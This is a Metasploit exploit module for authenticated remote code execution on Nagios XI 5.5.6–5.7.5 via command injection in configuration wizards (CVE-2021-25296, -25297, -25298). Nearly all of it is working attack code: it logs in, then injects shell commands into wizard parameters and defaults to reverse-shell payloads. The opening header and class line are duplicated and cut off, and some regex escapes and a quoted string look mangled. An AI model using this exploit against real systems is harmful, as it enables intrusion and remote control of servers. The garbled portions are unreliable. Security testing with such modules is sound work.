##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exp ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::NagiosXi
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
'Description' => %q{
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are
OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm
configuration wizards that allow an authenticated user to perform remote code
execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.

Valid credentials for a Nagios XI user are required. This module has
been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
},
'License' => MSF_LICENSE,
'Author' => [
'Matthew Mathur'
],
'References' => [
['CVE', '2021-25296'],
['CVE', '2021-25297'],
['CVE', '2021-25298'],
['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']
],
'Platform' => %w[linux unix],
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
'Targets' => [
[
'Linux (x86)', {
'Arch' => [ ARCH_X86 ],
'Platform' => 'linux',
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
[
'Linux (x64)', {
'Arch' => [ ARCH_X64 ],
'Platform' => 'linux',
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
[
'CMD', {
'Arch' => [ ARCH_CMD ],
'Platform' => 'unix',
# the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
}
]
],
'Privileged' => false,
'DefaultTarget' => 2,
'DisclosureDate' => '2021-02-13',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)

register_options [
OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])
]
end

def username
datastore['USERNAME']
end

def password
datastore['PASSWORD']
end

def finish_install
datastore['FINISH_INSTALL']
end

# Returns a status code an a error message on failure.
# On success returns the status code and an array so we
# can update the login_result and res_array variables appropriately.
def handle_unsigned_license(res_array, username, password, finish_install)
auth_cookies, nsp = res_array
sign_license_result = sign_license_agreement(auth_cookies, nsp)
if sign_license_result
return 5, 'Failed to sign license agreement'
end

print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
sleep 5
login_result, res_array = login_after_install_or_license(username, password, finish_install)
case login_result
when 1..4 # An error occurred, propagate the error message
return login_result, res_array[0]
when 5 # The Nagios XI license agreement still has not been signed
return 5, 'Failed to sign the license agreement.'
end

return login_result, res_array
end

def authenticate
# Use nagios_xi_login to try and authenticate.
login_result, res_array = nagios_xi_login(username, password, finish_install)
case login_result
when 1..3 # An error occurred, propagate the error message
return login_result, res_array[0]
when 4 # Nagios XI is not fully installed
install_result = install_nagios_xi(password)
if install_result # On installation failure, result is an array with the code and error message
return install_result[0], install_result[1]
end

login_result, res_array = login_after_install_or_license(username, password, finish_install)
case login_result
when 1..4 # An error occurred, propagate the error message
return login_result, res_array[0]
when 5 # The license agreement still needs to be signed
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
return login_result, res_array unless (login_result == 0)
end
when 5 # The license agreement still needs to be signed
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
return login_result, res_array unless (login_result == 0)
end

print_good('Successfully authenticated to Nagios XI.')
# Extract the authenticated cookies and nsp to use throughout the module
if res_array.length == 2
auth_cookies = res_array[1]
if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)
@auth_cookies = auth_cookies
else
return login_result, 'Failed to extract authentication cookies'
end
nsp = res_array[0].match(/nsp_str = "([a-z0-9]+)/)
if nsp
@nsp = nsp[1]
else
return login_result, 'Failed to extract nsp string'
end
else
return login_result, 'Failed to extract auth cookies and nsp string'
end

# Set the version here so both check and exploit can use it
nagios_version = nagios_xi_version(res_array[0])
if nagios_version.nil?
return 6, 'Unable to obtain the Nagios XI version from the dashboard'
end

print_status("Target is Nagios XI with version #{nagios_version}.")

# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
# so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
if /^d{4}rd(?:.d)?(?:(?:RCd)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
nagios_version = '1.0.0'
end
@version = Rex::Version.new(nagios_version)

return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
end

def check
# Authenticate to ensure we can access the NagiosXI version
auth_result, err_msg = authenticate
case auth_result
when 1
return CheckCode::Unknown(err_msg)
when 2, 4, 5, 6
return CheckCode::Detected(err_msg)
when 3
return CheckCode::Safe(err_msg)
end

if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')
return CheckCode::Appears
end

return CheckCode::Safe
end

def execute_command(cmd, _opts = {})
if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check
auth_result, err_msg = authenticate
case auth_result
when 1
fail_with(Failure::Disconnected, err_msg)
when 2, 4, 5, 6
fail_with(Failure::UnexpectedReply, err_msg)
when 3
fail_with(Failure::NotVulnerable, err_msg)
end
end

# execute payload based on the selected targeted configuration wizard
url_params = {
'update' => 1,
'nsp' => @nsp
}
# After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
# changes from address to ip_address
if @version <= Rex::Version.new('5.5.7')
address_param = 'address'
else
address_param = 'ip_address'
end

# CVE-2021-25296 affects the windowswmi configuration wizard.
if datastore['TARGET_CVE'] == 'CVE-2021-25296'
url_params = url_params.merge({
'nextstep' => 3,
'wizard' => 'windowswmi',
'ip_address' => Array.new(4) { rand(256) }.join('.'),
'domain' => Rex::Text.rand_text_alphanumeric(7..15),
'username' => Rex::Text.rand_text_alphanumeric(7..20),
'password' => Rex::Text.rand_text_alphanumeric(7..20),
'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
})
# CVE-2021-25297 affects the switch configuration wizard.
elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'
url_params = url_params.merge({
'nextstep' => 3,
'wizard' => 'switch',
address_param => Array.new(4) { rand(256) }.join('.') + ""; #{cmd};",
'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),
'scaninterfaces' => 'on'
})
# CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by
# specifying the digitalocean option for the wizard parameter.
elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'
url_params = url_params.merge({
address_param => Array.new(4) { rand(256) }.join('.') + "; #{cmd};",
'nextstep' => 4,
'wizard' => 'digitalocean'
})
else
fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')
end

print_status('Sending the payload...')
# Send the final request. Note that the target is not expected to respond if we get
# code execution. Therefore, we set the timeout on this request to 0.
send_request_cgi({
'method' => 'GET',
'uri' => '/nagiosxi/config/monitoringwizard.php',
'cookie' => @auth_cookies,
'vars_get' => url_params
})
end

def exploit
if target.arch.first == ARCH_CMD
execute_command(payload.encoded)
else
execute_cmdstager(background: true)
end
end
end